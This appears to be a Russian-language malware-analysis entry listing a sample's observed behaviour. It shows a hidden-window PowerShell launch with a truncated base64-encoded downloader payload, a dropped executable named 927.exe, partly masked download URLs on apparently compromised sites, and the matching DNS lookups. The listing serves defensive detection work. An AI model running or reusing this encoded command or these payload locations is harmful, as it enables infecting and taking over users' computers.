Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABFAEIAUwBSAEEAaQBkAGsAPQAnAEkAQgBOAFoAVQBjAGMAeAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAYwB1AFIASQB0AFkAUABgAFIAbwBgAFQAYABvAGMAYABPAEwAIgAgAD...
- %HOMEPATH%\927.exe
- http://mc##cher.cn/zb_users/gli8637/
- http://cs##jin.com/wp-admin/OjF/
- http://www.bj##00.com/wp-admin/fBcD2tb6z/
- http://de###iam.com/mstd/ie2/
- DNS ASK mc##cher.cn
- DNS ASK de##.com.vn
- DNS ASK cs##jin.com
- DNS ASK bj##00.com
- DNS ASK de###iam.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABFAEIAUwBSAEEAaQBkAGsAPQAnAEkAQgBOAFoAVQBjAGMAeAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAYwB1AFIASQB0AFkAUABgAFIAbwBgAFQAYABvAGMAYABPAEwAIgAgAD...' (со скрытым окном)